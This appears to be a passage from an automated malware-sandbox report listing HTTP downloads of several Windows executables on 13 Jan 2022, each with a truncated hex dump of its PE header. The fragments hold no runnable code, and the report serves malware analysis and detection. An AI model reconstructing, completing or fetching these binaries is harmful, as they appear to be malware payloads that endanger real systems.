00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 22:30:14 GMTContent-Type: application/octet-streamContent-Length: 226816Last-Modified: Thu, 13 Jan 2022 19:31:57 GMTConnection: keep-aliveETag: "61e07e2d-37600"Expires: Thu, 20 Jan 2022 22:30:14 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a7 79 e0 61 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 70 03 00 00 04 00 00 00 00 00 00 12 8e 03 00 00 20 00 00 00 a0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 03 00 00 02 00 00 fc a7 03 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 8d 03 00 4f 00 00 00 00 a0 03 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 0c 00 00 00 88 8c 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 20 6e 03 00 00 20 00 00 00 70 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 00 00 00 00 a0 03 00 00 02 00 00 00 72 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 03 00 00 02 00 00 00 74 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 8d 03 00 00 00 00 00 48 00 00 00 02 00 05 00 00 98 00 00 d0 68 00 00 03 00 02 00 01 00 00 06 d0 00 01 00 b8 8b 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 00 28 15 00 00 0a 00 16 28 16 00 00 0a 00 73 0a 00 00 06 28 17 00 00 0a 00 2a 26 02 28 18 00 00 0a 00 00 2a 00 00 00 13 30 02 00 39 00 00 00 01 00 00 11 00 7e 01 00 00 04 14 fe 01 0a 06 2c 22 00 72 01 00 00 70 d0 03 00 00 02 28 19 00 00 0a 6f 1a 00 00 0a 73 1b 00 00 0a 0b 07 80 01 00 00 04 00 7e 01 00 00 04 0c 2b 00 08 2a 00 00 00 13 30 01 00 0b 00 00 00 02 00 00 11 00 7e 02 00 00 04 0a 2b 00 06 2a 22 00 02 80 02 00 00 04 2a 13 30 03 00 21 00 00 00 03 00 00 11 00 28 03 00 00 06 72 63 00 00 70 7e 02 00 00 04 6f 1c 00 00 0a 0a 06 74 01 00 00 1b 0b 2b 00 07 2a 00 00 00 13 30 01 00 0b 00 00 00 04 00 00 11 00 7e 03 00 00 04 0a 2b 00 06 2a 22 02 28 1d 00 00 0a 00 2a 56 73 08 00 00 06 28 1e 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 5e 02 14 7d 04 00 00 04 02 28 1f 00 00 0a 00 00 02 28 14 00 00 06 00 2a 00 00 13 30 01 00 0f 00 00 00 05 00 00 11 00 73 38 00 00 06 0a 06 6f 20 00 00 0a
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Jan 2022 22:30:14 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Fri, 07 Jan 2022 23:09:58 GMTETag: "61d8c846-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 22:30:16 GMTContent-Type: application/octet-streamContent-Length: 535232Last-Modified: Thu, 13 Jan 2022 19:32:17 GMTConnection: keep-aliveETag: "61e07e41-82ac0"Expires: Thu, 20 Jan 2022 22:30:16 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 73 0f cc 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 3a 00 00 00 0a 04 00 00 00 00 00 00 a0 04 00 00 20 00 00 00 60 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 be bf 08 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e4 01 00 00 00 90 00 00 ac 08 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 6c 73 00 00 00 00 00 70 00 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 43 52 54 00 00 00 00 00 10 00 00 00 80 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 ac 08 04 00 00 90 00 00 ac 08 04 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 80 01 00 00 a0 04 00 11 7d 01 00 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:30:16 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 22:30:17 GMTContent-Type: application/octet-streamContent-Length: 2387648Last-Modified: Thu, 13 Jan 2022 20:12:05 GMTConnection: keep-aliveETag: "61e08795-246ec0"Expires: Thu, 20 Jan 2022 22:30:17 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 ca 5e 3d 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 64 3f 00 00 18 03 00 00 00 00 00 00 e0 42 00 00 20 00 00 00 a0 3f 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 44 00 00 04 00 00 6f 94 24 00 02 00 60 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 3f 00 dc 01 00 00 00 c0 3f 00 14 17 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 65 64 61 74 61 00 00 00 a0 3f 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 43 52 54 00 00 00 00 00 10 00 00 00 b0 3f 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 14 17 03 00 00 c0 3f 00 14 17 03 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 43 52 54 00 00 00 00 00 80 01 00 00 e0 42 00 17 79 01 00 00 1e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:30:19 GMTContent-Type: application/x-msdos-programContent-Length: 557664Connection: closeLast-Modified: Thu, 13 Jan 2022 19:20:04 GMTETag: "88260-5d57b92d7ebed"Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d6 ad 35 ab 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 24 03 00 00 2a 03 00 00 00 00 00 00 b0 06 00 00 20 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 30 08 00 00 04 00 00 1c 40 09 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 03 00 e4 01 00 00 00 80 03 00 50 29 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 69 64 61 74 61 00 00 00 60 03 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 70 64 61 74 61 00 00 00 10 00 00 00 70 03 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 29 03 00 00 80 03 00 30 06 03 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 61 00 00 80 01 00 00 b0 06 00 fc 78 01 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 22:30:23 GMTContent-Type: application/octet-streamContent-Length: 354816Last-Modified: Thu, 13 Jan 2022 22:06:44 GMTConnection: keep-aliveETag: "61e0a274-56a00"Expires: Thu, 20 Jan 2022 22:30:23 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f8 75 73 5a 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 08 01 00 00 5e 04 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 61 01 00 c8 00 00 00 00 80 01 00 34 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 64 01 00 2c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 63 6f 64 65 00 00 00 f0 37 00 00 00 10 00 00 00 38 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 00 00 00 a2 cf 00 00 00 50 00 00 00 d0 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a0 33 00 00 00 20 01 00 00 34 00 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 24 17 00 00 00 60 01 00 00 12 00 00 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 34 16 04 00 00 80 01 00 00 18 04 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
